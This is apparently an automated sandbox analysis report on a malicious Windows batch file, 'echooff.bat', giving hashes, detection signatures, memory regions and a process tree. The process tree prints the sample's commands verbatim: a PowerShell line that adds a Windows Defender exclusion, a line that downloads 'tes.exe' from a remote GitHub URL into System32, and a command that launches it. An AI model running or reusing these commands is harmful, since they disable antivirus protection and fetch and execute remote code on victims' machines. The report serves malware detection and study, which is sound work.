Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/03/2025, 20:49

General

  • Target

    echooff.bat

  • Size

    2KB

  • MD5

    1454db52a096ed81ab7ca936367ceabd

  • SHA1

    25c32881677a892e4b9bc7d45d387bec22847685

  • SHA256

    bf2edb2090118c826cb7fb3d3c7cbda1066bceaeaff02874d94f9ae940f2f09c

  • SHA512

    a895401536357a07d9bd9167f5c36152a8e06c68bf6967b8540493c51fc1f8cfd4bd60cf68a094ebddf33e272c3c39fa753952bba3c0ca0cc39bfc1e939792c7

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\echooff.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:536
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5 | find /i "MD5 hash"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\system32\certutil.exe
          certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5
          3⤵
            PID:2012
          • C:\Windows\system32\find.exe
            find /i "MD5 hash"
            3⤵
              PID:560
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\tes.exe'"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1936
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/main/tes.exe' -OutFile 'C:\Windows\System32\tes.exe'"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2964
          • C:\Windows\system32\cmd.exe
            cmd /min /C "set __COMPAT_LAYER=runasinvoker && start "" "C:\Windows\System32\tes.exe""
            2⤵
            • Access Token Manipulation: Create Process with Token
            PID:2676

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          28c1003b3d384848414b5d175ec09903

          SHA1

          c4d02c0b1b00d4a9f82eaedda078fea1f54779e4

          SHA256

          40b032575bfdbf5ce6cadf91ffdb8597b3427212821e07fa5c09cc1b35be1864

          SHA512

          fd4db0ba34089e110bf50c561c8d43524dcb91f348d1c0a167c2d2385b142d0b88b08ec5da2b375b2af0530dde452d4264dcfa4889a7f27a418de6322b0e6581

        • memory/1936-4-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

          Filesize

          4KB

        • memory/1936-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

          Filesize

          2.9MB

        • memory/1936-7-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

          Filesize

          9.6MB

        • memory/1936-9-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

          Filesize

          9.6MB

        • memory/1936-8-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

          Filesize

          9.6MB

        • memory/1936-6-0x0000000002780000-0x0000000002788000-memory.dmp

          Filesize

          32KB

        • memory/1936-10-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

          Filesize

          9.6MB

        • memory/1936-11-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

          Filesize

          9.6MB

        • memory/2964-17-0x000000001B770000-0x000000001BA52000-memory.dmp

          Filesize

          2.9MB

        • memory/2964-18-0x00000000028E0000-0x00000000028E8000-memory.dmp

          Filesize

          32KB